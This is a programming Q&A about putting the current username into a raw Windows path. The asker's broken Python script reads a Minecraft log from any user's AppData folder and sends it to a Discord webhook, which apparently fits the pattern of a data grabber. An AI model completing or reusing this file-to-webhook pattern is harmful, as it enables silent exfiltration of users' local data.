# python - how to enter a variable into a raw string?

Tags: python, minecraft

```
from discord_webhook import DiscordWebhook 
import getpass
user = getpass.getuser()

f = open(r'C:\\Users\USER\AppData\Roaming\.minecraft\logs\latest.log')
lines = f.readlines())

for line in lines:
    webhook= DiscordWebhook(url='webhook)

response = webhook.execute()
f.close()
```

i tried everything but i can seem to get the user variable in there help?
also it only returns the last line

Comment: It's not clear what you are trying to do. Where do you want to use `user`? What do you do with each line? (You're currently ignoring it.) This doesn't seem to have anything to do with the raw string you pass to `open` (unless you want to replace `eylon` with the value of `user`).

Comment: @chepner Do you think he had that "response = webhook.execute()"   line off the for statement or?

Comment: @chepner because he calls webhook's execute function, while webhook is declared inside for loop as I see.

Comment: I think the webhook is not correctly bounded with single quotation?

Comment: @chepner  so sorry it wasnt clear im kinda new to this anyways the thing im trying to do is change where eylon is to the user var

Comment: @chepner also sorry for ignoring

Comment: the webhook isnt the problem i think it works fine it just returns only the last line of that file

Comment: Please clarify your specific problem or provide additional details to highlight exactly what you need. As it's currently written, it's hard to tell exactly what you're asking.

Answer (score 0):

You can use a raw f-string:

```
f = open(rf'C:\\Users\{user}\AppData\Roaming\.minecraft\logs\latest.log')
```

---

```
>>> user='eylon'
>>> rf'C:\\Users\{user}\AppData\Roaming\.minecraft\logs\latest.log'
'C:\\\\Users\\eylon\\AppData\\Roaming\\.minecraft\\logs\\latest.log'
>>> print(rf'C:\\Users\{user}\AppData\Roaming\.minecraft\logs\latest.log')
C:\\Users\eylon\AppData\Roaming\.minecraft\logs\latest.log
```

Comment: What problems? The variable is substituted properly.

Comment: is was wrong it does 100% work thank you very much but it still only sends the last line

Comment: That's an entirely separate issue; but you are overwriting whatever `DiscordWebhook` returned on the previous line of the file with what it returns on the current line.